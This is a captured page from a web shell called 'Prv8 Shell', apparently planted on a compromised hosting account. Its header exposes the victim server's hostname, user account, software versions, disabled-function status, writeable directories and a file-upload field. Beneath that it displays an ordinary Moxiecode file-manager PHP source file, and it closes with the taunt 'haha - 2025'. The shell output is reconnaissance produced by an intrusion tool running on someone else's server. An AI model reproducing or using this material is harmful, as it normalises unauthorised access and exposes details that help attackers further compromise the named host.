Prv8 Shell
Server : Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
System : Linux server.jackjohnson.com 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
User : jackjohn ( 502)
PHP Version : 5.3.17
Disable Function : NONE
Directory :  /home/jackjohn/public_html/imagemanager/classes/FileSystems/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/jackjohn/public_html/imagemanager/classes/FileSystems/LocalFileImpl.php
<?php
/**
 * LocalFileImpl.php
 *
 * @package MCFileManager.filesystems
 * @author Moxiecode
 * @copyright Copyright © 2005, Moxiecode Systems AB, All rights reserved.
 */

require_once(getAbsPath("../classes/FileSystems/BaseFile.php"));
require_once(getAbsPath("../classes/FileSystems/FileFilter.php"));
require_once(getAbsPath("../classes/FileSystems/FileTreeHandler.php"));
require_once(getAbsPath("../classes/FileSystems/FileEventListener.php"));

/**
 * This is the local file system implementation of BaseFile.
 *
 * @package MCFileManager.filesystems
 */
class LocalFileImpl extends BaseFile {
	// Private fields
	var $_absPath = "";
	var $_fileFactory;
	var $_config;
	var $_type;
	var $_events = true;

	/**
	 * Creates a new absolute file.
	 *
	 * @param FileFactory $file_factory File factory reference.
	 * @param String $absolute_path Absolute path to local file.
	 * @param String $child_name Name of child file (Optional).
	 * @param String $type Optional file type.
	 */
	function LocalFileImpl(&$file_factory, $absolute_path, $child_name = "", $type = MC_IS_FILE) {
		$this->_fileFactory =& $file_factory;
		$this->_type = $type;

		if ($child_name != "")
			 $this->_absPath = removeTrailingSlash($absolute_path) . "/" . $child_name;
		else
			$this->_absPath = $absolute_path;
	}

	/**
	 * Set a bool regarding events triggering.
	 *
	 * @param Bool $trigger Trigger or not to trigger.
	 */
	function setTriggerEvents($trigger) {
		$this->_events = $trigger;
	}

	/**
	 * Returns bool if events are to be triggered or not.
	 *
	 * @return Bool bool for triggering events or not.
	 */
	function getTriggerEvents() {
		return $this->_events;
	}

	/**
	 * Returns the parent files absolute path.
	 *
	 * @return String parent files absolute path.
	 */
	function getParent() {
		$pathAr = explode("/", $this->_absPath);

		array_pop($pathAr);
		$path = implode("/", $pathAr);

		return ($path == "") ? "/" : $path;
	}

	/**
	 * Returns the parent files File instance.
	 *
	 * @return File parent files File instance or false if there is no more parents.
	 */
	function &getParentFile() {
		$file =& new LocalFileImpl($this->_fileFactory, $this->getParent());
		return $file;
	}

	/**
	 * Returns the file name of a file.
	 *
	 * @return string File name of file.
	 */
	function getName() {
		return basename($this->_absPath);
	}

	/**
	 * Returns the absolute path of the file.
	 *
	 * @return String absolute path of the file.
	 */
	function getAbsolutePath() {
		return $this->_absPath;
	}

	/**
	 * Creates a new empty file.
	 *
	 * @return boolean true - success, false - failure
	 */
	function createNewFile() {
		if (!file_exists(toOSPath($this->_absPath)) ) {
			if (($fp = fopen(toOSPath($this->_absPath), "w")) != null) {
				fclose($fp);

				// Chmod the file
				if (($mask = $this->_getConfigValue("filesystem.local.file_mask", false)) !== false)
					@chmod(toOSPath($this->_absPath), intval($mask, 8));

				// Chown the file
				if (($owner = $this->_getConfigValue("filesystem.local.file_owner", false)) !== false)
					$this->_chown(toOSPath($this->_absPath), $owner);

				if ($this->_events)
					$this->_fileFactory->dispatchFileEvent(ADD_ACTION, $this);

				return true;
			}
		}

		return false;
	}

	/**
	 * Imports a local file to the file system, for example when users upload files.
	 *											   
	 * @param String $local_absolute_path Absolute path to local file to import.
	 */
	function importFile($local_absolute_path = "") {
		// Add action
		if ($this->_events) {
			if ($this->isFile())
				$this->_fileFactory->dispatchFileEvent(ADD_ACTION, $this);
			else
				$this->_fileFactory->dispatchFileEvent(MKDIR_ACTION, $this);
		}
		// Chmod the file
		if (($mask = $this->_getConfigValue("filesystem.local.file_mask", false)) !== false)
			@chmod(toOSPath($this->_absPath), intval($mask, 8));

		// Chown the file
		if (($owner = $this->_getConfigValue("filesystem.local.file_owner", false)) !== false)
			$this->_chown(toOSPath($this->_absPath), $owner);
	}

	/**
	 * Returns true if the file has the specified access.
	 *
	 * @return boolean true if the file has the specified access.
	 */
	function verifyAccess($access) {
		return true;
	}

	/**
	 * Returns true if the file exists.
	 *
	 * @return boolean true if the file exists.
	 */
	function exists() {
		return file_exists(toOSPath($this->_absPath));
	}

	/**
	 * Returns true if the file is a directory.
	 *
	 * @return boolean true if the file is a directory.
	 */
	function isDirectory() {
		if (!$this->exists())
			return $this->_type == MC_IS_DIRECTORY;

		return is_dir(toOSPath($this->_absPath));
	}

	/**
	 * Returns true if the file is a file.
	 *
	 * @return boolean true if the file is a file.
	 */
	function isFile() {
		if (!$this->exists())
			return $this->_type == MC_IS_FILE;

		return is_file(toOSPath($this->_absPath));
	}

	/**
	 * Returns last modification date in ms as an long.
	 *
	 * @return long last modification date in ms as an long.
	 */
	function lastModified() {
		$details = @stat(toOSPath($this->_absPath));
		return $details[9];
	}

	/**
	 * Returns creation date in ms as an long.
	 *
	 * @return long creation date in ms as an long.
	 */
	function creationDate() {
		$details = @stat(toOSPath($this->_absPath));
		return $details[10];
	}

	/**
	 * Returns true if the files is readable.
	 *
	 * @return boolean true if the files is readable.
	 */
	function canRead() {
		return is_readable(toOSPath($this->_absPath));
	}

	/**
	 * Returns true if the files is writable.
	 *
	 * @return boolean true if the files is writable.
	 */
	function canWrite() {
		// Is windows
		if (DIRECTORY_SEPARATOR == "\\") {
			$path = toOSPath($this->_absPath);

			if (is_file($path)) {
				$fp = @fopen($path,'ab');

				if ($fp) {
					fclose($fp);
					return true;
				}
			} else if (is_dir($path)) {
				$tmpnam = time().md5(uniqid('iswritable'));
				if (@touch($path . '\\' . $tmpnam)) {
					unlink($path . '\\' . $tmpnam);
					return true;
				}
			}

			return false;
		}

		// Other OS:es
		return is_writeable(toOSPath($this->_absPath));
	}

	/**
	 * Returns file size as an long.
	 *
	 * @return long file size as an long.
	 */
	function length() {
		$details = @stat(toOSPath($this->_absPath));
		return $details[7];
	}

	/**
	 * Copies this file to the specified file instance.
	 *
	 * @param File $dest File to copy to.
	 * @return boolean true - success, false - failure
	 */
	function copyTo(&$dest) {
		if ($dest->exists())
			return false;

		// Copy in to your self?
		if (strpos($dest->getAbsolutePath(), $this->getAbsolutePath()) === 0)
			return false;

		if ($this->isDirectory()) {
			$treeHandler = new _LocalCopyDirTreeHandler($this->_fileFactory, $this, $dest, $handle_as_add_event);

			$this->listTree($treeHandler);

			return true;
		} else {
			$status = $this->_absPath == $dest->_absPath || copy($this->_absPath, $dest->_absPath);

			if ($status && $this->_events)
				$this->_fileFactory->dispatchFileEvent(COPY_ACTION, $this, $dest);

			// Chmod the file
			if (($mask = $dest->_getConfigValue("filesystem.local.file_mask", false)) !== false)
				@chmod(toOSPath($dest->_absPath), intval($mask, 8));

			// Chown the file
			if (($owner = $dest->_getConfigValue("filesystem.local.file_owner", false)) !== false)
				$this->_chown(toOSPath($dest->_absPath), $owner);

			return $status;
		}
	}

	/**
	 * Deletes the file.
	 *
	 * @param boolean $deep If this option is enabled files will be deleted recurive.
	 * @return boolean true - success, false - failure
	 */
	function delete($deep = false) {
		if (!$this->exists())
			return false;

		if (is_dir(toOSPath($this->_absPath))) {
			if ($deep) {
				// Get all the files
				$treeHandler = new _LocalDeleteDirTreeHandler($this->_fileFactory, $this);
				$this->listTree($treeHandler);

				// Delete the files
				$files = array_reverse($treeHandler->getFiles());
				foreach ($files as $file)
					$file->delete();

				// Hmm, should be better
				return true;
			}

			if (($status = rmdir(toOSPath($this->_absPath))) && ($this->_events))
				$this->_fileFactory->dispatchFileEvent(RMDIR_ACTION, $this);
		} else {
			if (($status = unlink(toOSPath($this->_absPath))) && ($this->_events))
				$this->_fileFactory->dispatchFileEvent(DELETE_ACTION, $this);
		}

		return $status;
	}

	/**
	 * Returns an array of File instances.
	 *
	 * @return Array array of File instances.
	 */
	function &listFiles() {
		$filter = $this->listFilesFiltered(new DummyFileFilter());
		return $filter;
	}

	/**
	 * Returns an array of BaseFile instances based on the specified filter instance.
	 *
	 * @param FileFilter &$filter FileFilter instance to filter files by.
	 * @return Array array of File instances based on the specified filter instance.
	 */
	function &listFilesFiltered(&$filter) {
	 	$dir = $this->_absPath;
	 	$files = array();
		$fileArray = array();

		if ($fHnd = opendir(toOSPath($dir))) {
			// Is there a trailing slash on the dir? Get rid of it
			//if ($dir[sizeof($dir)] == "/")
			//	$dir = substr($dir, 0, sizeof($dir) -1);

			while (false !== ($file = readdir($fHnd))) {
				if ($file == "." || $file == "..")
					continue;

				$fileArray[] = $dir . "/" . $file;
			}

			// Close handle
			closedir($fHnd);

			// Sort file array
			sort($fileArray);
			reset($fileArray);

			// Build object filearray
			foreach($fileArray as $afile) {
				$file =& new LocalFileImpl($this->_fileFactory, $afile);

				if (!$filter->accept($file))
					continue;

				array_push($files, $file);
			}
		}

		return $files;
	}

	/**
	 * Lists the file as an tree and calls the specified FileTreeHandler instance on each file. 
	 *
	 * @param FileTreeHandler &$file_tree_handler FileTreeHandler to invoke on each file.
	 */
	function listTree(&$file_tree_handler) {
		$this->_listTree($this, $file_tree_handler, new DummyFileFilter(), 0);
	}

	/**
	 * Lists the file as an tree and calls the specified FileTreeHandler instance on each file
	 * if the file filter accepts the file.
	 *
	 * @param FileTreeHandler &$file_tree_handler FileTreeHandler to invoke on each file.
	 * @param FileTreeHandler &$file_filter FileFilter instance to filter files by.
	 */
	function listTreeFiltered(&$file_tree_handler, &$file_filter) {
		$this->_listTree($this, $file_tree_handler, $file_filter, 0);
	}

	/**
	 * Creates a new directory.
	 *
	 * @return boolean true- success, false - failure
	 */
	function mkdir() {
		$status = mkdir(toOSPath($this->_absPath));

		// Chmod the dir
		if (($mask = $this->_getConfigValue("filesystem.local.directory_mask", false)) !== false)
			@chmod(toOSPath($this->_absPath), intval($mask, 8));

		// Chown the dir
		if (($owner = $this->_getConfigValue("filesystem.local.directory_owner", false)) !== false)
			$this->_chown(toOSPath($this->_absPath), $owner);

		if ($status && $this->_events)
			$this->_fileFactory->dispatchFileEvent(MKDIR_ACTION, $this);

		return $status;
	}

	/**
	 * Renames/Moves this file to the specified file instance.
	 *
	 * @param File $dest File to rename/move to.
	 * @return boolean true- success, false - failure
	 */
	function renameTo(&$dest) {
		// Copy in to your self?
		if (strpos($dest->getAbsolutePath(), $this->getAbsolutePath()) === 0)
			return false;

		// Allready exists
		if ($dest->exists())
			return false;

		$status = $this->_absPath == $dest->_absPath || rename(toOSPath($this->_absPath), toOSPath($dest->_absPath));

		if ($status && $this->_events)
			$this->_fileFactory->dispatchFileEvent(RENAME_ACTION, $this, $dest);

		$isFile = is_file(toOSPath($this->_absPath));

		// Chmod the file/directory
		if (($mask = $dest->_getConfigValue("filesystem.local." . ($isFile ? "file" : "directory") . "_mask", false)) !== false)
			@chmod(toOSPath($dest->_absPath), intval($mask, 8));

		// Chown the file/directory
		if (($owner = $dest->_getConfigValue("filesystem.local." . ($isFile ? "file" : "directory") . "_owner", false)) !== false)
			$this->_chown(toOSPath($dest->_absPath), $owner);

		return $status;
	}

	/*
	 * Sets the last-modified time of the file or directory.
	 *
	 * @param String $datetime The new date/time to set the file, in timestamp format
	 * @return boolean true- success, false - failure
	 */
	function setLastModified($datetime) {
		return touch(toOSPath($this->_absPath), $datetime);
	}

	/**
	 * Returns a name/value array with file information. This array
	 * contains the filename/extension.
	 *
	 * @return string Name/value array with file information.
	 */
	function getInfo() {
		$info = array();

		$info['filename'] = basename($this->_absPath);
		$ar = explode('.', $this->_absPath);
		$info['extension'] = array_pop($ar);

		return $info;
	}

	// * * Private methods

	/**
	 * Lists files recursive, and places the files in the specified array.
	 */
	function _listTree($file, &$file_tree_handler, &$file_filter, $level) {
		$state = $file_tree_handler->CONTINUE;

		if ($file_filter->accept($file)) {
			$state = $file_tree_handler->handle($file, $level);

			if ($state == $file_tree_handler->ABORT || $state == $file_tree_handler->ABORT_FOLDER)
				return $state;
		}

		$files = $file->listFiles();

		foreach ($files as $file) {
			if ($file_filter->accept($file)) {
				if ($file->isFile()) {
					// This is some weird shit!
					//if (!is_object($file_filter))
						$state = $file_tree_handler->handle($file, $level);
				} else {
					$state = $this->_listTree($file, $file_tree_handler, $file_filter, ++$level);
					--$level;
				}
			}

			if ($state == $file_tree_handler->ABORT)
				return $state;
		}

		return $file_tree_handler->CONTINUE;
	}

	/**
	 * Returns a merged name/value array of config elements.
	 *
	 * @return Array Merged name/value array of config elements.
	 */
	function getConfig() {
		$globalConf = $this->_fileFactory->getConfig();
		$rootpath = $this->_fileFactory->getRootPath();

		// Not cached config
		if (!$this->_config) {
			$localConfig = array();

			$this->_config = $globalConf;

			// Get files up the tree
			$accessFiles = array();
			$file =& $this;

			if ($file->isFile())
				$file =& $file->getParentFile();

			while ($file->exists() && $file->getAbsolutePath() != "/") {
				$accessFile =& new LocalFileImpl($this->_fileFactory, $file->getAbsolutePath(), $globalConf["filesystem.local.access_file_name"]);
				if ($accessFile->exists())
					$accessFiles[] = $accessFile;

				if (strpos(strtolower(toOSPath($file->getParent())), strtolower(toOSPath($rootpath))) === false)
					break;

				$file =& $file->getParentFile();
			}

			// Parse and merge
			$allowoverrideKeys = array();
			foreach ($this->_config as $key => $value) {
				$keyChunks = explode('.', $key);

				if ($keyChunks[count($keyChunks)-1] == "allow_override") {
					foreach (explode(',', $value) as $keySuffix) {
						$keyChunks[count($keyChunks)-1] = $keySuffix;
						$allowoverrideKeys[] = implode('.', $keyChunks);
					}
				}
			}

			foreach (array_reverse($accessFiles) as $accessFile) {
				$config = array();

				// Parse ini file
				if (($fp = fopen(toOSPath($accessFile->getAbsolutePath()), "r"))) {
					while (!feof($fp)) {
						$line = trim(fgets($fp));

						// Skip comments
						if (substr($line, 0, 1) == "#")
							continue;

						// Split rows
						if (($pos = strpos($line, "=")) !== FALSE)
							$config[substr($line, 0, $pos)] = substr($line, $pos+1);
					}

					fclose($fp);
				}

				// Handle local config values
				$curDir = $this->isFile() ? $this->getParent() : $this->getAbsolutePath();
				if ($accessFile->getParent() == $curDir) {
					foreach ($config as $key => $value) {
						if (substr($key, 0, 1) == '_')
							$localConfig[substr($key, 1)] = $value;
					}
				}

				// Parse allow keys and deny keys
				$denyOverrideKeys = array();
				foreach ($config as $key => $value) {
					$keyChunks = explode('.', $key);
					$lastChunk = $keyChunks[count($keyChunks)-1];

					if ($lastChunk == "allow_override" || $lastChunk == "deny_override") {
						foreach (explode(',', $value) as $keySuffix) {
							$keyChunks[count($keyChunks)-1] = $keySuffix;
							$allowDenyKey = implode('.', $keyChunks);

							if (in_array($allowDenyKey, $allowoverrideKeys)) {
								if ($lastChunk == "allow_override")
									$allowoverrideKeys[] = $allowDenyKey;
								else
									$denyOverrideKeys[] = $allowDenyKey;
							}
						}
					}
				}

				// Remove the denied keys from the allow list
/*				foreach ($denyOverrideKeys as $denyKey) {
					for ($i=0; $i<count($allowoverrideKeys); $i++) {
						if ($denyKey == $allowoverrideKeys[$i])
							unset($allowoverrideKeys[$i]);
					}
				}*/

				// Add all overriden values
				foreach ($config as $key => $value) {
					$validAllKey = false;

					foreach ($allowoverrideKeys as $allowkey) {
						if (strpos($allowkey, "*") > 0) {
							$allowkey = str_replace("*", "", $allowkey);
							// echo $allowkey . "," . $key . strpos($allowkey, $key) . "<br>";
							if (strpos($key, $allowkey) === 0) {
								$validAllKey = true;
								break;
							}
						}
					}

					if ((in_array($key, $allowoverrideKeys) || $validAllKey) && !in_array($key, $denyOverrideKeys)) {
						if (strpos($value, '${') !== false)
							$value = str_replace('${configpath}', $accessFile->getParent(), $value);

						$this->_config[$key] = $value;
					}
				}
			}

			// Variable substitute the values
			foreach ($this->_config as $key => $value) {
				if (!is_array($value) && strpos($value, '${') !== false) {
					if ($this->isFile())
						$path = $this->getAbsolutePath();
					else
						$path = $this->getParent();

					$this->_config[$key] = str_replace('${path}', $path, $value);
					$this->_config[$key] = str_replace('${rootpath}', toUnixPath(getRealPath($this->_config, 'filesystem.rootpath')), $value);
				}
			}

			// Force local config
			foreach ($localConfig as $key => $value)
				$this->_config[$key] = $value;

/*			foreach ($this->_config as $key => $value) {
				if (in_array($key, $allowoverrideKeys)) {
					// Seems to be a variable
					if (strpos($value, '${') !== false) {
						$matches = array();
						preg_match_all('/\${(.*)}/i', $value, $matches);
						var_dump($matches);
						foreach ($matches as $match)
							$this->_config[$key] = str_replace('${' . $match . '}', $this->_config[$match], $this->_config[$key]);
					}
				}
			}*/
		}

		return $this->_config;
	}

	/**
	 * Returns a config value by the specified key.
	 *
	 * @param String key Key to return value by.
	 * @param String default_value Optional default value.
	 * @return String Value returned from config.
	 */
	function _getConfigValue($key, $default_value = "") {
		$config = $this->getConfig();

		return $config[$key] ? $config[$key] : $default_value;
	}

	function _chown($path, $owner) {
		if ($owner == "")
			return;

		$owner = explode(":", $owner);

		// Only user
		if (count($owner) == 1)
			array_push($owner, "");

		// Hmm
		if (count($owner) != 2)
			return;

		// Set user
		if ($owner[0] != "")
			@chown($path, $owner[0]);

		// Set group
		if ($owner[1] != "")
			@chgrp($path, $owner[1]);
	}
}

class _LocalCopyDirTreeHandler extends FileTreeHandler {
	var $_fromFile;
	var $_destFile;
	var $_fileFactory;
	var $_handle_as_add_event;

	function _LocalCopyDirTreeHandler(&$file_factory, $from_file, $dest_file, $handle_as_add_event) {
		$this->_fileFactory = $file_factory;
		$this->_fromFile = $from_file;
		$this->_destFile = $dest_file;
		$this->_handle_as_add_event = $handle_as_add_event;
	}

	/**
	 * Handles a file instance while looping an tree of directories.
	 * 
	 * @param File $file File object reference
	 * @param int $level Current level of tree parse
	 * @return int State of what to do next can be CONTINUE, ABORT or ABORTFOLDER.
	 */
	function handle($file, $level) {
		$toPath = $this->_destFile->getAbsolutePath();
		$toPath .= substr($file->getAbsolutePath(), strlen($this->_fromFile->getAbsolutePath()));
		$toFile = new LocalFileImpl($this->_fileFactory, $toPath);

		//echo $file->getAbsolutePath() . "->" . $toPath . "<br />";

		// Do action
		if ($file->isDirectory())
			$toFile->mkdir();
		else
			$file->copyTo($toFile);

		return $this->CONTINUE;
	}
}

class _LocalDeleteDirTreeHandler extends FileTreeHandler {
	var $_fileFactory;
	var $_dir;
	var $_files;

	function _LocalDeleteDirTreeHandler(&$file_factory, $dir) {
		$this->_fileFactory = $file_factory;
		$this->_dir = $dir;
		$this->_files = array();
	}

	/**
	 * Returns all the files and dirs.
	 *
	 * @return Array All the files and dirs.
	 */
	function getFiles() {
		return $this->_files;
	}

	/**
	 * Handles a file instance while looping an tree of directories.
	 * 
	 * @param File $file File object reference
	 * @param int $level Current level of tree parse
	 * @return int State of what to do next can be CONTINUE, ABORT or ABORTFOLDER.
	 */
	function handle($file, $level) {
		$this->_files[] = $file;

		//$file->delete();
		return $this->CONTINUE;
	}
}

?>

haha - 2025